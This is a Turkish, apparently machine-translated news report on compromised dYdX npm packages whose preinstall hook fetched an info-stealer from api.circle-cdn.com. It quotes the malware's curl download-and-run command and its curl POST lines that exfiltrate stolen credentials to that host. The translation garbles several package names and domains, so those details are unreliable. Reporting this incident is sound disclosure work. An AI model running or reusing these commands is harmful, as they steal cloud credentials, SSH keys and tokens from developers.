Kripto borsası dYdX tarafından yayınlanan ve en az 44 kripto para projesi tarafından kullanılan çoklu npm paketlerinin güvenliği ihlal edilmiş gibi görünüyor.
Ethereum blok zinciri tarafından desteklenen dydX, Bitcoin (BTC) ve Ether (ETH) dahil olmak üzere 35’in üzerinde popüler kripto para birimi için sürekli ticaret seçenekleri sunan merkezi olmayan bir değişim platformudur. Yazma sırasında, platformun ortalamasını gözlemledik günlük işlem hacmi 1 milyar dolara dokundu.
Söz konusu paketler, bir dYdX personelinin npm hesabından yayınlandı ve kurulduğunda bir sistemde bilgi hırsızlarını çalıştıracak yasadışı kod içerdiği tespit edildi.
kripto borsası tarafından kullanılan npm paketleri tehlikeye girdi
Güvenlik araştırmacısı Maciej Mensfeld yazılım tedarik zinciri güvenlik firması Mend’den ve Diffend.io’nun yaratıcısı, güvenliği ihlal edilmiş birden fazla npm paketiyle karşılaştığını ve gizlice bilgi hırsızları yüklediğini bildirdi.
BleepingComputer, aşağıda gösterilen söz konusu paketlerin bir dYdX kripto platformu çalışanının npm hesabından yayınlanmış gibi göründüğünü gözlemledi, ancak bu uzlaşmanın kesin nedeni henüz belirlenmedi:
- @dydxprotokol/yalnız – 0.41.1, 0.41.2 sürümleri
- @dydxprotocol/sürekli – 1.2.2, 1.2.3 sürümleri
Daha önceki bir danışma belgesi, ‘@dydxprotocol/node-service-base-dev’ paketinin de etkilendiğini iddia etti, ancak o zamandan beri geri çekilmiş.
BleepingComputer, ‘solo’ paketinin güvenliği ihlal edilmiş 0.41.1 sürümünün hala npm’de yaşıyor yazarken:
Bu paketler “dYdX Solo Ticaret Protokolü için kullanılan Ethereum Akıllı Sözleşmeleri ve TypeScript kitaplığını” oluşturur.
Örneğin, solo paket şu kişiler tarafından kullanılır: en az 44 GitHub deposu birden fazla kripto platformuna ait. Hem ‘solo’ hem de ‘sürekli’ durum için GitHub README’ler, bunların “şu anda kullanılan trade.dydx.exchange“
AWS IAM kimliklerini, SSH anahtarlarını, GitHub belirteçlerini çalmak için kullanılan sahte ‘Circle’ CDN alanı
Örneğin Mensfeld, ‘solo’ paketinin manifest dosyasına enjekte edilen sorunlu kod parçasını paylaştı.
‘Solo’ paketi kurulur kurulmaz, bir ön yükleme komut dosyasının içeriğini tetikler, indirir ve çalıştırır. ci.js üzerinde barındırılan JavaScript dosyası api.circle-cdn.com.
BleepingComputer durumu “circle-cdn.com” tarafından görülen kamu malı kayıtları oldukça yakın bir zamanda, 14 Eylül’de kaydedildi.
Etki alanı adı ve kötü amaçlı dosya adında ‘ci.js’ kullanımı, büyük olasılıkla tehdit aktörünün bir yazılım geliştirme CI/CD (sürekli entegrasyon ve sürekli teslim) platformu olan CircleCI’yi taklit etme girişimleridir. Buna karşılık, CircleCI’nin resmi API’si Cloudflare tarafından barındırılır ve şu adresten erişilebilir: daireci.com/api/v2/pipeline.
“Bakıyor burada fark… a ön yükleme eklendi,” diye yazdı Mensfeld GitHub sorunu yaptıktan sonra dYdX topluluğunu uyarmak platforma ulaşma şansı yok.
Araştırmacı, “Ancak bu komut dosyası kötü niyetli görünen bir kod içeriyor… Kimlik bilgilerini ve diğer sırları çalıyor gibi görünüyor” dedi.
BleepingComputer şunu gözlemledi: ci.js Aşağıda gösterildiği gibi, güvenliği ihlal edilmiş sürümler tarafından çekilen komut dosyası, başka bir Python komut dosyasını indirir ve çalıştırır, setup.py
curl http://api.circle-cdn.com/setup.py –output cisetup.py >> /dev/null 2>&1 && python3 cisetup.py && rm cisetup.py
Bu, bilgi çalma kodunu içeren bu ‘setup.py’dir. IAM kimlik bilgileri diğer sırların yanı sıra kurbanın Amazon AWS örneğinden.
Aşağıda gösterilen ve kötü amaçlı kodun bağlandığı 169.254.xx IP adresi, Otomatik Özel IP Adresleme (APIPA) adı verilen bir özelliğin sonucudur.
APIPA, DHCP aracılığıyla otomatik bir IP adresi almak üzere yapılandırılmış bir bilgisayar çalıştırıldığında çağrılır. DHCP sunucusundan bunu yapamıyor.
Amazon AWS tarafından yayınlanan belgeler, bu IP adresinin daha geniş anlamda nasıl alakalı olduğunu gösterir. IAM bağlamı.
Ayrıca kod, kullanıcının GitHub belirteçlerini, SSH anahtarlarını, ortam değişkenlerini ve harici IP adresini de çalar.
Çalınan veriler daha sonra aynı api.circle-cdn.com alan adı:
subprocess.getoutput(“curl -X POST http://api.circle-cdn.com/uploader.php -F ‘uploaded_file=@” + dosyaadı2 + “‘ -F ‘gönder=Yükle'”)
subprocess.getoutput(‘curl -X POST http://api.circle-cdn.com/api.php -d “textdata=” + allen + “”‘)
BleepingComputer, kötü niyetli kodun geçmişte görülenle çarpıcı bir şekilde aynı olduğunu gözlemledi. kötü niyetli ‘PyGrata’ Python paketleri bu aynı zamanda kurbanın AWS kimlik bilgilerini, ortam değişkenlerini ve SSH anahtarlarını da çaldı.
dYdX baş mimarı Brendan Chou, Mensfeld’e teşekkür etti. derhal raporlama uzlaşma ve doğruladı “tüm [compromised versions] soloPasha_07.41.1 dışında kaldırıldı”, bunu npm’nin “geçici bir gözetim” gibi görünen şeye bağlıyor.
BleepingComputer, bu uzlaşmanın etkisini ve kapsamını daha iyi anlamak için yayınlamadan önce e-posta ve Twitter aracılığıyla dYdX’e ulaştı ve geri döndüğümüzde bu raporu güncelleyeceğiz.
Bu olay, geçen yılki popüler npm kitaplıklarının ele geçirilmesini takip ediyor.make-ayrıştırıcı-js,’ ‘coa’ ve ‘rc’ kripto madencileri ve şifre hırsızları ile bağlanmıştır. Sadece haftalar önce, PyPI paketleri bir saldırı sonucunda ele geçirildi. geliştiricileri hedefleyen kimlik avı kampanyası.
Son zamanlarda yazılım tedarik zincirine yönelik bu tür tehditler, npm ve PyPI gibi önde gelen açık kaynak kayıtlarının bakıcılar için iki faktörlü kimlik doğrulamasını zorunlu kıl en yaygın kullanılan kütüphanelerden sorumludur.